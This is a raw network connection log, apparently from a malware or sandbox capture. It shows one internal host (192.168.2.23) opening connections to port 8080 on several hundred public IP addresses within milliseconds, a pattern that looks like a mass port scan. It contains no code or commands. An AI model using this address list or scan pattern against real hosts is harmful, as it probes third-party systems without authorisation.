Nov 22, 2023 08:37:53.644680977 CET	54329	8080	192.168.2.23	62.126.48.253
Nov 22, 2023 08:37:53.644681931 CET	54329	8080	192.168.2.23	62.23.206.254
Nov 22, 2023 08:37:53.644689083 CET	54329	8080	192.168.2.23	85.126.108.106
Nov 22, 2023 08:37:53.644691944 CET	54329	8080	192.168.2.23	62.16.231.192
Nov 22, 2023 08:37:53.644705057 CET	54329	8080	192.168.2.23	85.71.254.147
Nov 22, 2023 08:37:53.644709110 CET	54329	8080	192.168.2.23	62.234.61.138
Nov 22, 2023 08:37:53.644716978 CET	54329	8080	192.168.2.23	31.187.17.19
Nov 22, 2023 08:37:53.644732952 CET	54329	8080	192.168.2.23	31.180.199.31
Nov 22, 2023 08:37:53.644732952 CET	54329	8080	192.168.2.23	94.60.42.231
Nov 22, 2023 08:37:53.644732952 CET	54329	8080	192.168.2.23	31.211.148.74
Nov 22, 2023 08:37:53.644735098 CET	54329	8080	192.168.2.23	95.170.81.168
Nov 22, 2023 08:37:53.644740105 CET	54329	8080	192.168.2.23	31.197.99.217
Nov 22, 2023 08:37:53.644752026 CET	54329	8080	192.168.2.23	95.68.233.168
Nov 22, 2023 08:37:53.644752026 CET	54329	8080	192.168.2.23	95.252.239.115
Nov 22, 2023 08:37:53.644752026 CET	54329	8080	192.168.2.23	95.38.252.220
Nov 22, 2023 08:37:53.644754887 CET	54329	8080	192.168.2.23	95.27.63.130
Nov 22, 2023 08:37:53.644758940 CET	54329	8080	192.168.2.23	95.228.254.120
Nov 22, 2023 08:37:53.644762039 CET	54329	8080	192.168.2.23	85.211.96.105
Nov 22, 2023 08:37:53.644767046 CET	54329	8080	192.168.2.23	94.170.43.12
Nov 22, 2023 08:37:53.644781113 CET	54329	8080	192.168.2.23	94.228.56.178
Nov 22, 2023 08:37:53.644784927 CET	54329	8080	192.168.2.23	85.97.188.254
Nov 22, 2023 08:37:53.644800901 CET	54329	8080	192.168.2.23	85.57.113.221
Nov 22, 2023 08:37:53.644809961 CET	54329	8080	192.168.2.23	62.226.184.1
Nov 22, 2023 08:37:53.644810915 CET	54329	8080	192.168.2.23	94.217.206.213
Nov 22, 2023 08:37:53.644814968 CET	54329	8080	192.168.2.23	85.14.234.236
Nov 22, 2023 08:37:53.644817114 CET	54329	8080	192.168.2.23	94.49.32.83
Nov 22, 2023 08:37:53.644818068 CET	54329	8080	192.168.2.23	95.245.103.177
Nov 22, 2023 08:37:53.644817114 CET	54329	8080	192.168.2.23	31.158.139.159
Nov 22, 2023 08:37:53.644834995 CET	54329	8080	192.168.2.23	95.148.59.10
Nov 22, 2023 08:37:53.644845009 CET	54329	8080	192.168.2.23	95.192.232.236
Nov 22, 2023 08:37:53.644859076 CET	54329	8080	192.168.2.23	94.53.214.200
Nov 22, 2023 08:37:53.644870043 CET	54329	8080	192.168.2.23	31.152.111.139
Nov 22, 2023 08:37:53.644872904 CET	54329	8080	192.168.2.23	62.249.40.200
Nov 22, 2023 08:37:53.644879103 CET	54329	8080	192.168.2.23	31.146.172.190
Nov 22, 2023 08:37:53.644884109 CET	54329	8080	192.168.2.23	85.122.72.97
Nov 22, 2023 08:37:53.644884109 CET	54329	8080	192.168.2.23	62.194.123.89
Nov 22, 2023 08:37:53.644884109 CET	54329	8080	192.168.2.23	62.209.209.99
Nov 22, 2023 08:37:53.644896030 CET	54329	8080	192.168.2.23	85.163.239.100
Nov 22, 2023 08:37:53.644896984 CET	54329	8080	192.168.2.23	62.244.220.115
Nov 22, 2023 08:37:53.644907951 CET	54329	8080	192.168.2.23	94.236.236.115
Nov 22, 2023 08:37:53.644912958 CET	54329	8080	192.168.2.23	94.149.14.193
Nov 22, 2023 08:37:53.644913912 CET	54329	8080	192.168.2.23	95.231.178.209
Nov 22, 2023 08:37:53.644920111 CET	54329	8080	192.168.2.23	94.34.82.234
Nov 22, 2023 08:37:53.644922972 CET	54329	8080	192.168.2.23	94.201.161.112
Nov 22, 2023 08:37:53.644927979 CET	54329	8080	192.168.2.23	94.57.205.134
Nov 22, 2023 08:37:53.644942999 CET	54329	8080	192.168.2.23	31.181.6.98
Nov 22, 2023 08:37:53.644958019 CET	54329	8080	192.168.2.23	95.17.1.246
Nov 22, 2023 08:37:53.644963026 CET	54329	8080	192.168.2.23	95.8.121.197
Nov 22, 2023 08:37:53.644968987 CET	54329	8080	192.168.2.23	95.206.68.124
Nov 22, 2023 08:37:53.644970894 CET	54329	8080	192.168.2.23	62.120.43.233
Nov 22, 2023 08:37:53.644975901 CET	54329	8080	192.168.2.23	62.203.161.221
Nov 22, 2023 08:37:53.644975901 CET	54329	8080	192.168.2.23	95.18.189.131
Nov 22, 2023 08:37:53.644984961 CET	54329	8080	192.168.2.23	95.41.201.58
Nov 22, 2023 08:37:53.645000935 CET	54329	8080	192.168.2.23	31.10.39.154
Nov 22, 2023 08:37:53.645003080 CET	54329	8080	192.168.2.23	85.15.6.163
Nov 22, 2023 08:37:53.645005941 CET	54329	8080	192.168.2.23	94.160.83.215
Nov 22, 2023 08:37:53.645009995 CET	54329	8080	192.168.2.23	95.72.119.84
Nov 22, 2023 08:37:53.645020008 CET	54329	8080	192.168.2.23	62.139.66.76
Nov 22, 2023 08:37:53.645028114 CET	54329	8080	192.168.2.23	31.183.157.250
Nov 22, 2023 08:37:53.645030022 CET	54329	8080	192.168.2.23	31.146.223.51
Nov 22, 2023 08:37:53.645046949 CET	54329	8080	192.168.2.23	85.195.205.11
Nov 22, 2023 08:37:53.645050049 CET	54329	8080	192.168.2.23	62.3.36.110
Nov 22, 2023 08:37:53.645056009 CET	54329	8080	192.168.2.23	85.159.246.128
Nov 22, 2023 08:37:53.645061016 CET	54329	8080	192.168.2.23	85.66.228.36
Nov 22, 2023 08:37:53.645061016 CET	54329	8080	192.168.2.23	62.125.28.229
Nov 22, 2023 08:37:53.645061016 CET	54329	8080	192.168.2.23	62.113.152.4
Nov 22, 2023 08:37:53.645064116 CET	54329	8080	192.168.2.23	95.21.19.233
Nov 22, 2023 08:37:53.645071983 CET	54329	8080	192.168.2.23	85.124.44.185
Nov 22, 2023 08:37:53.645076036 CET	54329	8080	192.168.2.23	95.247.204.145
Nov 22, 2023 08:37:53.645076036 CET	54329	8080	192.168.2.23	94.251.237.201
Nov 22, 2023 08:37:53.645076990 CET	54329	8080	192.168.2.23	95.226.223.91
Nov 22, 2023 08:37:53.645076990 CET	54329	8080	192.168.2.23	62.221.191.142
Nov 22, 2023 08:37:53.645080090 CET	54329	8080	192.168.2.23	62.30.190.6
Nov 22, 2023 08:37:53.645086050 CET	54329	8080	192.168.2.23	62.132.52.208
Nov 22, 2023 08:37:53.645097017 CET	54329	8080	192.168.2.23	62.72.133.222
Nov 22, 2023 08:37:53.645098925 CET	54329	8080	192.168.2.23	62.95.65.243
Nov 22, 2023 08:37:53.645101070 CET	54329	8080	192.168.2.23	31.201.51.224
Nov 22, 2023 08:37:53.645116091 CET	54329	8080	192.168.2.23	95.178.131.56
Nov 22, 2023 08:37:53.645116091 CET	54329	8080	192.168.2.23	85.5.206.124
Nov 22, 2023 08:37:53.645128965 CET	54329	8080	192.168.2.23	62.154.104.242
Nov 22, 2023 08:37:53.645132065 CET	54329	8080	192.168.2.23	31.2.241.12
Nov 22, 2023 08:37:53.645140886 CET	54329	8080	192.168.2.23	62.23.193.49
Nov 22, 2023 08:37:53.645142078 CET	54329	8080	192.168.2.23	85.135.166.211
Nov 22, 2023 08:37:53.645147085 CET	54329	8080	192.168.2.23	31.215.135.240
Nov 22, 2023 08:37:53.645149946 CET	54329	8080	192.168.2.23	85.51.197.119
Nov 22, 2023 08:37:53.645164013 CET	54329	8080	192.168.2.23	62.32.174.73
Nov 22, 2023 08:37:53.645185947 CET	54329	8080	192.168.2.23	85.249.225.0
Nov 22, 2023 08:37:53.645185947 CET	54329	8080	192.168.2.23	85.119.230.103
Nov 22, 2023 08:37:53.645186901 CET	54329	8080	192.168.2.23	85.150.67.119
Nov 22, 2023 08:37:53.645185947 CET	54329	8080	192.168.2.23	31.112.177.105
Nov 22, 2023 08:37:53.645186901 CET	54329	8080	192.168.2.23	31.148.216.79
Nov 22, 2023 08:37:53.645186901 CET	54329	8080	192.168.2.23	85.34.101.142
Nov 22, 2023 08:37:53.645186901 CET	54329	8080	192.168.2.23	31.125.59.59
Nov 22, 2023 08:37:53.645190954 CET	54329	8080	192.168.2.23	31.48.181.148
Nov 22, 2023 08:37:53.645205021 CET	54329	8080	192.168.2.23	62.188.107.121
Nov 22, 2023 08:37:53.645205975 CET	54329	8080	192.168.2.23	95.142.144.177
Nov 22, 2023 08:37:53.645216942 CET	54329	8080	192.168.2.23	95.107.70.127
Nov 22, 2023 08:37:53.645224094 CET	54329	8080	192.168.2.23	31.53.193.141
Nov 22, 2023 08:37:53.645251989 CET	54329	8080	192.168.2.23	85.178.18.255
Nov 22, 2023 08:37:53.645253897 CET	54329	8080	192.168.2.23	31.246.171.13
Nov 22, 2023 08:37:53.645256042 CET	54329	8080	192.168.2.23	95.211.142.218
Nov 22, 2023 08:37:53.645263910 CET	54329	8080	192.168.2.23	31.23.199.79
Nov 22, 2023 08:37:53.645263910 CET	54329	8080	192.168.2.23	62.141.109.114
Nov 22, 2023 08:37:53.645263910 CET	54329	8080	192.168.2.23	62.111.140.86
Nov 22, 2023 08:37:53.645263910 CET	54329	8080	192.168.2.23	85.247.94.8
Nov 22, 2023 08:37:53.645263910 CET	54329	8080	192.168.2.23	95.104.21.242
Nov 22, 2023 08:37:53.645267010 CET	54329	8080	192.168.2.23	62.21.47.222
Nov 22, 2023 08:37:53.645273924 CET	54329	8080	192.168.2.23	95.228.8.173
Nov 22, 2023 08:37:53.645276070 CET	54329	8080	192.168.2.23	62.114.165.40
Nov 22, 2023 08:37:53.645276070 CET	54329	8080	192.168.2.23	85.34.245.38
Nov 22, 2023 08:37:53.645276070 CET	54329	8080	192.168.2.23	94.201.101.208
Nov 22, 2023 08:37:53.645276070 CET	54329	8080	192.168.2.23	94.145.178.224
Nov 22, 2023 08:37:53.645276070 CET	54329	8080	192.168.2.23	94.41.128.152
Nov 22, 2023 08:37:53.645292044 CET	54329	8080	192.168.2.23	94.168.105.20
Nov 22, 2023 08:37:53.645298958 CET	54329	8080	192.168.2.23	85.172.76.134
Nov 22, 2023 08:37:53.645298958 CET	54329	8080	192.168.2.23	95.122.101.48
Nov 22, 2023 08:37:53.645313978 CET	54329	8080	192.168.2.23	62.239.204.8
Nov 22, 2023 08:37:53.645318985 CET	54329	8080	192.168.2.23	95.50.30.65
Nov 22, 2023 08:37:53.645319939 CET	54329	8080	192.168.2.23	95.199.25.170
Nov 22, 2023 08:37:53.645323992 CET	54329	8080	192.168.2.23	85.119.200.202
Nov 22, 2023 08:37:53.645334959 CET	54329	8080	192.168.2.23	85.40.106.182
Nov 22, 2023 08:37:53.645338058 CET	54329	8080	192.168.2.23	85.159.252.204
Nov 22, 2023 08:37:53.645344973 CET	54329	8080	192.168.2.23	85.11.96.172
Nov 22, 2023 08:37:53.645353079 CET	54329	8080	192.168.2.23	95.195.42.192
Nov 22, 2023 08:37:53.645360947 CET	54329	8080	192.168.2.23	94.164.109.50
Nov 22, 2023 08:37:53.645366907 CET	54329	8080	192.168.2.23	85.172.153.218
Nov 22, 2023 08:37:53.645381927 CET	54329	8080	192.168.2.23	85.88.46.38
Nov 22, 2023 08:37:53.645384073 CET	54329	8080	192.168.2.23	95.172.88.202
Nov 22, 2023 08:37:53.645395994 CET	54329	8080	192.168.2.23	94.121.79.233
Nov 22, 2023 08:37:53.645397902 CET	54329	8080	192.168.2.23	85.101.14.229
Nov 22, 2023 08:37:53.645397902 CET	54329	8080	192.168.2.23	95.38.132.92
Nov 22, 2023 08:37:53.645410061 CET	54329	8080	192.168.2.23	95.200.156.196
Nov 22, 2023 08:37:53.645425081 CET	54329	8080	192.168.2.23	62.238.34.230
Nov 22, 2023 08:37:53.645426989 CET	54329	8080	192.168.2.23	94.214.255.225
Nov 22, 2023 08:37:53.645427942 CET	54329	8080	192.168.2.23	95.207.36.68
Nov 22, 2023 08:37:53.645430088 CET	54329	8080	192.168.2.23	85.214.170.131
Nov 22, 2023 08:37:53.645442009 CET	54329	8080	192.168.2.23	85.112.180.54
Nov 22, 2023 08:37:53.645448923 CET	54329	8080	192.168.2.23	31.160.174.241
Nov 22, 2023 08:37:53.645453930 CET	54329	8080	192.168.2.23	31.117.5.67
Nov 22, 2023 08:37:53.645456076 CET	54329	8080	192.168.2.23	94.227.2.218
Nov 22, 2023 08:37:53.645456076 CET	54329	8080	192.168.2.23	62.36.172.58
Nov 22, 2023 08:37:53.645456076 CET	54329	8080	192.168.2.23	31.199.117.126
Nov 22, 2023 08:37:53.645456076 CET	54329	8080	192.168.2.23	85.37.26.247
Nov 22, 2023 08:37:53.645463943 CET	54329	8080	192.168.2.23	62.223.161.90
Nov 22, 2023 08:37:53.645463943 CET	54329	8080	192.168.2.23	85.20.134.129
Nov 22, 2023 08:37:53.645467997 CET	54329	8080	192.168.2.23	94.43.41.120
Nov 22, 2023 08:37:53.645468950 CET	54329	8080	192.168.2.23	85.181.224.21
Nov 22, 2023 08:37:53.645487070 CET	54329	8080	192.168.2.23	85.119.111.44
Nov 22, 2023 08:37:53.645492077 CET	54329	8080	192.168.2.23	95.243.54.159
Nov 22, 2023 08:37:53.645494938 CET	54329	8080	192.168.2.23	85.177.98.24
Nov 22, 2023 08:37:53.645498037 CET	54329	8080	192.168.2.23	94.166.65.159
Nov 22, 2023 08:37:53.645499945 CET	54329	8080	192.168.2.23	31.237.194.182
Nov 22, 2023 08:37:53.645512104 CET	54329	8080	192.168.2.23	62.193.116.79
Nov 22, 2023 08:37:53.645518064 CET	54329	8080	192.168.2.23	94.129.113.210
Nov 22, 2023 08:37:53.645519018 CET	54329	8080	192.168.2.23	85.7.190.83
Nov 22, 2023 08:37:53.645519018 CET	54329	8080	192.168.2.23	85.157.174.78
Nov 22, 2023 08:37:53.645526886 CET	54329	8080	192.168.2.23	85.173.105.9
Nov 22, 2023 08:37:53.645526886 CET	54329	8080	192.168.2.23	62.53.233.127
Nov 22, 2023 08:37:53.645543098 CET	54329	8080	192.168.2.23	94.140.41.212
Nov 22, 2023 08:37:53.645545959 CET	54329	8080	192.168.2.23	62.12.216.141
Nov 22, 2023 08:37:53.645545959 CET	54329	8080	192.168.2.23	85.172.120.1
Nov 22, 2023 08:37:53.645556927 CET	54329	8080	192.168.2.23	62.93.23.75
Nov 22, 2023 08:37:53.645562887 CET	54329	8080	192.168.2.23	31.60.37.92
Nov 22, 2023 08:37:53.645570040 CET	54329	8080	192.168.2.23	94.68.39.236
Nov 22, 2023 08:37:53.645570040 CET	54329	8080	192.168.2.23	95.68.52.239
Nov 22, 2023 08:37:53.645570993 CET	54329	8080	192.168.2.23	31.228.5.20
Nov 22, 2023 08:37:53.645571947 CET	54329	8080	192.168.2.23	94.58.170.204
Nov 22, 2023 08:37:53.645577908 CET	54329	8080	192.168.2.23	31.169.125.114
Nov 22, 2023 08:37:53.645592928 CET	54329	8080	192.168.2.23	85.109.147.122
Nov 22, 2023 08:37:53.645593882 CET	54329	8080	192.168.2.23	31.7.79.221
Nov 22, 2023 08:37:53.645601988 CET	54329	8080	192.168.2.23	95.187.237.253
Nov 22, 2023 08:37:53.645606041 CET	54329	8080	192.168.2.23	62.68.8.66
Nov 22, 2023 08:37:53.645622015 CET	54329	8080	192.168.2.23	95.91.238.21
Nov 22, 2023 08:37:53.645626068 CET	54329	8080	192.168.2.23	94.155.198.140
Nov 22, 2023 08:37:53.645629883 CET	54329	8080	192.168.2.23	31.105.90.232
Nov 22, 2023 08:37:53.645632982 CET	54329	8080	192.168.2.23	94.252.49.48
Nov 22, 2023 08:37:53.645636082 CET	54329	8080	192.168.2.23	31.226.251.119
Nov 22, 2023 08:37:53.645653963 CET	54329	8080	192.168.2.23	62.14.187.255
Nov 22, 2023 08:37:53.645653963 CET	54329	8080	192.168.2.23	31.125.29.155
Nov 22, 2023 08:37:53.645657063 CET	54329	8080	192.168.2.23	95.130.45.124
Nov 22, 2023 08:37:53.645663977 CET	54329	8080	192.168.2.23	94.209.67.218
Nov 22, 2023 08:37:53.645670891 CET	54329	8080	192.168.2.23	62.232.49.238
Nov 22, 2023 08:37:53.645680904 CET	54329	8080	192.168.2.23	94.129.147.232
Nov 22, 2023 08:37:53.645683050 CET	54329	8080	192.168.2.23	95.32.81.95
Nov 22, 2023 08:37:53.645685911 CET	54329	8080	192.168.2.23	95.71.78.211
Nov 22, 2023 08:37:53.645688057 CET	54329	8080	192.168.2.23	31.189.73.179
Nov 22, 2023 08:37:53.645688057 CET	54329	8080	192.168.2.23	95.51.129.163
Nov 22, 2023 08:37:53.645704031 CET	54329	8080	192.168.2.23	62.127.6.157
Nov 22, 2023 08:37:53.645708084 CET	54329	8080	192.168.2.23	31.28.98.138
Nov 22, 2023 08:37:53.645787954 CET	54329	8080	192.168.2.23	94.54.15.138
Nov 22, 2023 08:37:53.645792961 CET	54329	8080	192.168.2.23	95.61.193.6
Nov 22, 2023 08:37:53.645807981 CET	54329	8080	192.168.2.23	94.13.198.147
Nov 22, 2023 08:37:53.645812035 CET	54329	8080	192.168.2.23	94.86.216.47
Nov 22, 2023 08:37:53.645826101 CET	54329	8080	192.168.2.23	94.126.60.63
Nov 22, 2023 08:37:53.645828962 CET	54329	8080	192.168.2.23	62.192.87.237
Nov 22, 2023 08:37:53.645836115 CET	54329	8080	192.168.2.23	94.103.95.135
Nov 22, 2023 08:37:53.645843983 CET	54329	8080	192.168.2.23	94.29.15.129
Nov 22, 2023 08:37:53.645848036 CET	54329	8080	192.168.2.23	31.7.78.183
Nov 22, 2023 08:37:53.645859957 CET	54329	8080	192.168.2.23	95.199.48.141
Nov 22, 2023 08:37:53.645859957 CET	54329	8080	192.168.2.23	95.91.126.38
Nov 22, 2023 08:37:53.645865917 CET	54329	8080	192.168.2.23	94.250.249.237
Nov 22, 2023 08:37:53.645872116 CET	54329	8080	192.168.2.23	85.187.173.182
Nov 22, 2023 08:37:53.645881891 CET	54329	8080	192.168.2.23	94.51.35.165
Nov 22, 2023 08:37:53.645895958 CET	54329	8080	192.168.2.23	62.71.169.40
Nov 22, 2023 08:37:53.645912886 CET	54329	8080	192.168.2.23	31.201.73.250
Nov 22, 2023 08:37:53.645919085 CET	54329	8080	192.168.2.23	31.11.170.65
Nov 22, 2023 08:37:53.645927906 CET	54329	8080	192.168.2.23	62.40.96.168
Nov 22, 2023 08:37:53.645931959 CET	54329	8080	192.168.2.23	94.38.178.138
Nov 22, 2023 08:37:53.645936012 CET	54329	8080	192.168.2.23	31.82.191.180
Nov 22, 2023 08:37:53.645951986 CET	54329	8080	192.168.2.23	62.80.34.253
Nov 22, 2023 08:37:53.645952940 CET	54329	8080	192.168.2.23	94.133.252.68
Nov 22, 2023 08:37:53.645952940 CET	54329	8080	192.168.2.23	85.118.83.27
Nov 22, 2023 08:37:53.645962954 CET	54329	8080	192.168.2.23	85.165.52.48
Nov 22, 2023 08:37:53.645967960 CET	54329	8080	192.168.2.23	94.253.238.67
Nov 22, 2023 08:37:53.645971060 CET	54329	8080	192.168.2.23	62.155.231.127
Nov 22, 2023 08:37:53.645971060 CET	54329	8080	192.168.2.23	95.102.97.35
Nov 22, 2023 08:37:53.645971060 CET	54329	8080	192.168.2.23	95.21.216.214
Nov 22, 2023 08:37:53.645971060 CET	54329	8080	192.168.2.23	85.50.95.153
Nov 22, 2023 08:37:53.645972967 CET	54329	8080	192.168.2.23	95.71.28.196
Nov 22, 2023 08:37:53.645975113 CET	54329	8080	192.168.2.23	94.242.47.83
Nov 22, 2023 08:37:53.645987034 CET	54329	8080	192.168.2.23	62.9.229.231
Nov 22, 2023 08:37:53.645987988 CET	54329	8080	192.168.2.23	94.52.219.81
Nov 22, 2023 08:37:53.645987988 CET	54329	8080	192.168.2.23	95.222.218.170
Nov 22, 2023 08:37:53.646003962 CET	54329	8080	192.168.2.23	62.181.246.20
Nov 22, 2023 08:37:53.646003962 CET	54329	8080	192.168.2.23	94.5.171.180
Nov 22, 2023 08:37:53.646013975 CET	54329	8080	192.168.2.23	95.48.63.110
Nov 22, 2023 08:37:53.646022081 CET	54329	8080	192.168.2.23	62.27.108.178
Nov 22, 2023 08:37:53.646084070 CET	54329	8080	192.168.2.23	31.47.225.37
Nov 22, 2023 08:37:53.646094084 CET	54329	8080	192.168.2.23	62.64.14.101
Nov 22, 2023 08:37:53.646094084 CET	54329	8080	192.168.2.23	95.125.190.166
Nov 22, 2023 08:37:53.646097898 CET	54329	8080	192.168.2.23	95.164.127.228
Nov 22, 2023 08:37:53.646099091 CET	54329	8080	192.168.2.23	85.201.112.75
Nov 22, 2023 08:37:53.646106958 CET	54329	8080	192.168.2.23	95.208.48.87
Nov 22, 2023 08:37:53.646120071 CET	54329	8080	192.168.2.23	95.179.76.17
Nov 22, 2023 08:37:53.646120071 CET	54329	8080	192.168.2.23	95.54.72.1
Nov 22, 2023 08:37:53.646135092 CET	54329	8080	192.168.2.23	85.218.192.237
Nov 22, 2023 08:37:53.646136045 CET	54329	8080	192.168.2.23	94.223.210.87
Nov 22, 2023 08:37:53.646147966 CET	54329	8080	192.168.2.23	94.36.20.16
Nov 22, 2023 08:37:53.646147966 CET	54329	8080	192.168.2.23	85.106.100.165
Nov 22, 2023 08:37:53.646174908 CET	54329	8080	192.168.2.23	95.125.184.25
Nov 22, 2023 08:37:53.646178961 CET	54329	8080	192.168.2.23	85.86.27.163
Nov 22, 2023 08:37:53.646178961 CET	54329	8080	192.168.2.23	95.136.15.57
Nov 22, 2023 08:37:53.646178961 CET	54329	8080	192.168.2.23	62.129.17.178
Nov 22, 2023 08:37:53.646179914 CET	54329	8080	192.168.2.23	95.162.91.73
Nov 22, 2023 08:37:53.646193027 CET	54329	8080	192.168.2.23	95.10.224.104
Nov 22, 2023 08:37:53.646197081 CET	54329	8080	192.168.2.23	95.245.137.120
Nov 22, 2023 08:37:53.646200895 CET	54329	8080	192.168.2.23	62.38.20.201
Nov 22, 2023 08:37:53.646212101 CET	54329	8080	192.168.2.23	94.207.65.138
Nov 22, 2023 08:37:53.646214962 CET	54329	8080	192.168.2.23	85.88.133.55
Nov 22, 2023 08:37:53.646220922 CET	54329	8080	192.168.2.23	62.102.8.191
Nov 22, 2023 08:37:53.646235943 CET	54329	8080	192.168.2.23	95.178.89.226
Nov 22, 2023 08:37:53.646249056 CET	54329	8080	192.168.2.23	62.0.254.40
Nov 22, 2023 08:37:53.646250963 CET	54329	8080	192.168.2.23	85.236.137.216
Nov 22, 2023 08:37:53.646265030 CET	54329	8080	192.168.2.23	31.212.198.139
Nov 22, 2023 08:37:53.646265984 CET	54329	8080	192.168.2.23	94.204.166.36
Nov 22, 2023 08:37:53.646270990 CET	54329	8080	192.168.2.23	85.219.107.36
Nov 22, 2023 08:37:53.646270990 CET	54329	8080	192.168.2.23	62.31.251.20
Nov 22, 2023 08:37:53.646285057 CET	54329	8080	192.168.2.23	94.84.41.195
Nov 22, 2023 08:37:53.646285057 CET	54329	8080	192.168.2.23	31.222.64.87
Nov 22, 2023 08:37:53.646291018 CET	54329	8080	192.168.2.23	31.211.212.204
Nov 22, 2023 08:37:53.646298885 CET	54329	8080	192.168.2.23	31.183.40.240
Nov 22, 2023 08:37:53.646298885 CET	54329	8080	192.168.2.23	95.145.8.79
Nov 22, 2023 08:37:53.646308899 CET	54329	8080	192.168.2.23	31.210.82.239
Nov 22, 2023 08:37:53.646312952 CET	54329	8080	192.168.2.23	95.148.227.252
Nov 22, 2023 08:37:53.646328926 CET	54329	8080	192.168.2.23	94.199.109.205
Nov 22, 2023 08:37:53.646330118 CET	54329	8080	192.168.2.23	94.129.201.20
Nov 22, 2023 08:37:53.646330118 CET	54329	8080	192.168.2.23	95.126.161.133
Nov 22, 2023 08:37:53.646341085 CET	54329	8080	192.168.2.23	31.50.6.251
Nov 22, 2023 08:37:53.646344900 CET	54329	8080	192.168.2.23	62.2.101.69
Nov 22, 2023 08:37:53.646344900 CET	54329	8080	192.168.2.23	85.56.222.148
Nov 22, 2023 08:37:53.646349907 CET	54329	8080	192.168.2.23	85.255.1.181
Nov 22, 2023 08:37:53.646365881 CET	54329	8080	192.168.2.23	85.224.157.59
Nov 22, 2023 08:37:53.646368027 CET	54329	8080	192.168.2.23	31.228.97.134
Nov 22, 2023 08:37:53.646377087 CET	54329	8080	192.168.2.23	95.234.180.211
Nov 22, 2023 08:37:53.646385908 CET	54329	8080	192.168.2.23	85.133.9.103
Nov 22, 2023 08:37:53.646409035 CET	54329	8080	192.168.2.23	94.246.121.33
Nov 22, 2023 08:37:53.646409035 CET	54329	8080	192.168.2.23	85.210.8.148
Nov 22, 2023 08:37:53.646426916 CET	54329	8080	192.168.2.23	85.125.96.210
Nov 22, 2023 08:37:53.646436930 CET	54329	8080	192.168.2.23	31.163.14.125
Nov 22, 2023 08:37:53.646439075 CET	54329	8080	192.168.2.23	31.85.148.99
Nov 22, 2023 08:37:53.646450996 CET	54329	8080	192.168.2.23	94.144.31.150
Nov 22, 2023 08:37:53.646454096 CET	54329	8080	192.168.2.23	95.41.254.30
Nov 22, 2023 08:37:53.646466970 CET	54329	8080	192.168.2.23	85.249.180.39
Nov 22, 2023 08:37:53.646476030 CET	54329	8080	192.168.2.23	31.65.187.234
Nov 22, 2023 08:37:53.646486998 CET	54329	8080	192.168.2.23	62.215.118.77
Nov 22, 2023 08:37:53.646488905 CET	54329	8080	192.168.2.23	94.99.203.37
Nov 22, 2023 08:37:53.646497965 CET	54329	8080	192.168.2.23	62.110.151.40
Nov 22, 2023 08:37:53.646514893 CET	54329	8080	192.168.2.23	62.213.8.123
Nov 22, 2023 08:37:53.646514893 CET	54329	8080	192.168.2.23	31.143.116.116
Nov 22, 2023 08:37:53.646514893 CET	54329	8080	192.168.2.23	94.68.72.134
Nov 22, 2023 08:37:53.646514893 CET	54329	8080	192.168.2.23	62.144.161.113
Nov 22, 2023 08:37:53.646527052 CET	54329	8080	192.168.2.23	95.226.2.39
Nov 22, 2023 08:37:53.646541119 CET	54329	8080	192.168.2.23	31.139.38.81
Nov 22, 2023 08:37:53.646543980 CET	54329	8080	192.168.2.23	31.245.230.118
Nov 22, 2023 08:37:53.646543980 CET	54329	8080	192.168.2.23	94.67.170.168
Nov 22, 2023 08:37:53.646559000 CET	54329	8080	192.168.2.23	85.71.201.141
Nov 22, 2023 08:37:53.646559000 CET	54329	8080	192.168.2.23	95.126.98.53
Nov 22, 2023 08:37:53.646563053 CET	54329	8080	192.168.2.23	62.182.37.146
Nov 22, 2023 08:37:53.646574020 CET	54329	8080	192.168.2.23	95.246.142.30
Nov 22, 2023 08:37:53.646576881 CET	54329	8080	192.168.2.23	62.230.25.101
Nov 22, 2023 08:37:53.646590948 CET	54329	8080	192.168.2.23	85.25.36.206
Nov 22, 2023 08:37:53.646594048 CET	54329	8080	192.168.2.23	31.33.74.0
Nov 22, 2023 08:37:53.646605015 CET	54329	8080	192.168.2.23	62.251.38.174
Nov 22, 2023 08:37:53.646608114 CET	54329	8080	192.168.2.23	95.140.96.122
Nov 22, 2023 08:37:53.646622896 CET	54329	8080	192.168.2.23	31.129.54.227
Nov 22, 2023 08:37:53.646622896 CET	54329	8080	192.168.2.23	94.246.177.199
Nov 22, 2023 08:37:53.646624088 CET	54329	8080	192.168.2.23	31.118.243.138
Nov 22, 2023 08:37:53.646624088 CET	54329	8080	192.168.2.23	85.78.199.48
Nov 22, 2023 08:37:53.646630049 CET	54329	8080	192.168.2.23	94.194.127.152
Nov 22, 2023 08:37:53.646641970 CET	54329	8080	192.168.2.23	94.7.167.94
Nov 22, 2023 08:37:53.646644115 CET	54329	8080	192.168.2.23	95.89.154.103
Nov 22, 2023 08:37:53.646658897 CET	54329	8080	192.168.2.23	94.19.105.229
Nov 22, 2023 08:37:53.646672964 CET	54329	8080	192.168.2.23	31.147.242.124
Nov 22, 2023 08:37:53.646672964 CET	54329	8080	192.168.2.23	62.15.71.193
Nov 22, 2023 08:37:53.646678925 CET	54329	8080	192.168.2.23	95.182.198.163
Nov 22, 2023 08:37:53.646687031 CET	54329	8080	192.168.2.23	31.94.30.119
Nov 22, 2023 08:37:53.646712065 CET	54329	8080	192.168.2.23	31.80.221.53
Nov 22, 2023 08:37:53.646728039 CET	54329	8080	192.168.2.23	95.41.88.252
Nov 22, 2023 08:37:53.646742105 CET	54329	8080	192.168.2.23	95.66.81.76
Nov 22, 2023 08:37:53.646742105 CET	54329	8080	192.168.2.23	94.15.19.235
Nov 22, 2023 08:37:53.646743059 CET	54329	8080	192.168.2.23	62.33.177.105
Nov 22, 2023 08:37:53.646742105 CET	54329	8080	192.168.2.23	85.252.76.106
Nov 22, 2023 08:37:53.646742105 CET	54329	8080	192.168.2.23	85.53.53.42
Nov 22, 2023 08:37:53.646744013 CET	54329	8080	192.168.2.23	85.120.137.93
Nov 22, 2023 08:37:53.646754980 CET	54329	8080	192.168.2.23	95.203.81.102
Nov 22, 2023 08:37:53.646756887 CET	54329	8080	192.168.2.23	62.217.230.4
Nov 22, 2023 08:37:53.646764994 CET	54329	8080	192.168.2.23	85.5.229.206
Nov 22, 2023 08:37:53.646768093 CET	54329	8080	192.168.2.23	85.165.140.23
Nov 22, 2023 08:37:53.646780968 CET	54329	8080	192.168.2.23	95.228.59.255
Nov 22, 2023 08:37:53.646780968 CET	54329	8080	192.168.2.23	85.81.239.35
Nov 22, 2023 08:37:53.646781921 CET	54329	8080	192.168.2.23	31.65.27.165
Nov 22, 2023 08:37:53.646797895 CET	54329	8080	192.168.2.23	94.142.149.234
Nov 22, 2023 08:37:53.646799088 CET	54329	8080	192.168.2.23	62.195.71.116
